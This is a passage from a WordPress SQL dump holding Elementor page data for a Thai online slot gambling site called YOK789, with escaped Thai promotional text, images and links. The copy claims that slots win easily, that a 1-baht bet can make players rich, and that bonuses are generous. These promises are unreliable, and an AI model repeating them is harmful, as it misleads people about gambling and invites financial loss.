400;\\\">\\u00a0\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e04\\u0e48\\u0e32\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e15\\u0e34\\u0e21\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e44\\u0e1b\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c \\u0e08\\u0e30\\u0e25\\u0e2d\\u0e07\\u0e08\\u0e31\\u0e1a\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01 \\u0e14\\u0e39\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e17\\u0e2a\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e40\\u0e01\\u0e21\\u0e44\\u0e2b\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e01\\u0e47\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e14\\u0e35\\u0e07\\u0e32\\u0e21\\u0e04\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e20\\u0e32\\u0e1e\\u0e25\\u0e37\\u0e48\\u0e19 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e04\\u0e23\\u0e1a \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e42\\u0e1b\\u0e23 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e1d\\u0e36\\u0e01\\u0e2d\\u0e48\\u0e32\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2b\\u0e32\\u0e2a\\u0e39\\u0e15\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e43\\u0e0a\\u0e49\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e1b\\u0e31\\u0e49\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e04\\u0e48\\u0e2d\\u0e22\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e01\\u0e47\\u0e40\\u0e14\\u0e34\\u0e19\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e40\\u0e09\\u0e35\\u0e22\\u0e1a\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e01\\u0e4b\\u0e32\\u0e44\\u0e14\\u0e49\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e17\\u0e38\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e23\\u0e2d\\u0e1a\\u0e41\\u0e23\\u0e01 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e39\\u0e48\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e27\\u0e22\\u0e14\\u0e49\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e08\\u0e32\\u0e01\\u0e28\\u0e39\\u0e19\\u0e22\\u0e4c\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e35\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2461,334,'_thumbnail_id','273'),(2462,334,'_elementor_edit_mode','builder'),(2463,334,'_elementor_template_type','wp-page'),(2464,334,'_elementor_version','3.35.5'),(2465,334,'_elementor_pro_version','3.32.3'),(2466,334,'_wp_page_template','default'),(2467,334,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2468,334,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/True-wallet-Yok789.webp\",\"id\":274,\"size\":\"\",\"alt\":\"YOK789\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Slot-NO1-Yok789.webp\",\"id\":278,\"size\":\"\",\"alt\":\"Yok789\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"YOK789 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><a href=\\\"https:\\/\\/amb18b.com\\/\\\"><b>YOK789<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e04\\u0e37\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1b\\u0e25\\u0e35\\u0e48\\u0e22\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e27\\u0e48\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e04\\u0e34\\u0e14\\u0e40\\u0e22\\u0e2d\\u0e30 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e2b\\u0e22\\u0e38\\u0e14\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e39\\u0e48 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e25\\u0e2d\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e42\\u0e1b\\u0e23\\u0e01\\u0e47\\u0e44\\u0e25\\u0e48\\u0e25\\u0e48\\u0e32\\u0e01\\u0e33\\u0e44\\u0e23\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e2a\\u0e1b\\u0e35\\u0e14 \\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e40\\u0e15\\u0e34\\u0e21\\u0e16\\u0e2d\\u0e19\\u0e40\\u0e23\\u0e47\\u0e27\\u0e17\\u0e31\\u0e19\\u0e43\\u0e08\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35\\u0e21\\u0e35\\u0e04\\u0e48\\u0e32 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e43\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e04\\u0e37\\u0e2d\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e36\\u0e01\\u0e04\\u0e31\\u0e01\\u0e1c\\u0e2a\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e27\\u0e48\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e49\\u0e27\\u0e21\\u0e35\\u0e25\\u0e38\\u0e49\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e17\\u0e38\\u0e19\\u0e2b\\u0e19\\u0e32\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1b\\u0e31\\u0e49\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e42\\u0e15\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e2d\\u0e07\\u0e2b\\u0e32\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e17\\u0e49\\u0e32\\u0e17\\u0e32\\u0e22 \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e27\\u0e22\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d34d1e8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e04\\u0e27\\u0e32\\u0e21\\u0e19\\u0e48\\u0e32\\u0e2a\\u0e19\\u0e43\\u0e08\\u0e02\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23 YOK789 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"07fc632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e31\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49\\u0e21\\u0e35\\u0e41\\u0e04\\u0e48\\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e42\\u0e04\\u0e15\\u0e23\\u0e44\\u0e27 \\u0e01\\u0e23\\u0e2d\\u0e01\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e02\\u0e31\\u0e49\\u0e19\\u0e01\\u0e47\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e25\\u0e38\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e17\\u0e35\\u0e48\\u0e17\\u0e38\\u0e01\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2b\\u0e19\\u0e32 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e41\\u0e25\\u0e30\\u0e18\\u0e38\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21\\u0e16\\u0e39\\u0e01\\u0e14\\u0e39\\u0e41\\u0e25\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e14\\u0e35 \\u0e17\\u0e35\\u0e48\\u0e2a\\u0e33\\u0e04\\u0e31\\u0e0d\\u0e04\\u0e37\\u0e2d\\u0e21\\u0e35\\u0e17\\u0e35\\u0e21\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e04\\u0e2d\\u0e22\\u0e0b\\u0e31\\u0e1e\\u0e1e\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e35\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e40\\u0e01\\u0e34\\u0e14\\u0e02\\u0e36\\u0e49\\u0e19 <\\/span><a href=\\\"https:\\/\\/luca333auto.com\\/\\\"><b>\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e08\\u0e38\\u0e14\\u0e41\\u0e02\\u0e47\\u0e07\\u0e2d\\u0e35\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2a\\u0e21\\u0e48\\u0e33\\u0e40\\u0e2a\\u0e21\\u0e2d \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e44\\u0e21\\u0e48\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e08\\u0e33\\u0e40\\u0e08 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e44\\u0e23\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2d\\u0e30\\u0e44\\u0e23\\u0e2a\\u0e14\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e2d\\u0e07 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e31\\u0e19\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e49\\u0e32\\u0e27\\u0e41\\u0e23\\u0e01\\u0e2a\\u0e39\\u0e48\\u0e40\\u0e2a\\u0e49\\u0e19\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e18\\u0e23\\u0e23\\u0e21\\u0e14\\u0e32<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6b44269\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li><span style=\\\"color: #99cc00;\\\"><b>YOK789 <\\/b><\\/span><b><span style=\\\"color: #99cc00;\\\">\\u0e41\\u0e08\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e19\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21<\\/span> <\\/b><\\/li><\\/ul><p><b><span style=\\\"font-weight: 400;\\\">\\u0e16\\u0e49\\u0e32\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e17\\u0e35\\u0e48\\u0e08\\u0e31\\u0e1a\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e44\\u0e14\\u0e49 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e22\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e19\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e01\\u0e31\\u0e4a\\u0e01 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e42\\u0e1b\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e27\\u0e35\\u0e22\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e48\\u0e27\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e15\\u0e25\\u0e2d\\u0e14 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e15\\u0e34\\u0e21\\u0e40\\u0e07\\u0e34\\u0e19\\u0e21\\u0e35\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e21\\u0e32\\u0e01\\u0e01\\u0e27\\u0e48\\u0e32\\u0e1b\\u0e01\\u0e15\\u0e34 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e1e\\u0e35\\u0e04\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e44\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e19\\u0e32\\u0e19 \\u0e41\\u0e04\\u0e48\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e47\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e25\\u0e38\\u0e22\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e43\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e25\\u0e22\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e21\\u0e35\\u0e1a\\u0e39\\u0e2a\\u0e15\\u0e4c\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2b\\u0e27\\u0e31\\u0e07\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19\\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e42\\u0e1b\\u0e23\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e14\\u0e31\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e1f\\u0e35\\u0e25\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e49\\u0e27\\u0e44\\u0e14\\u0e49\\u0e01\\u0e33\\u0e44\\u0e23\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e19\\u0e35\\u0e22\\u0e19 \\u0e46 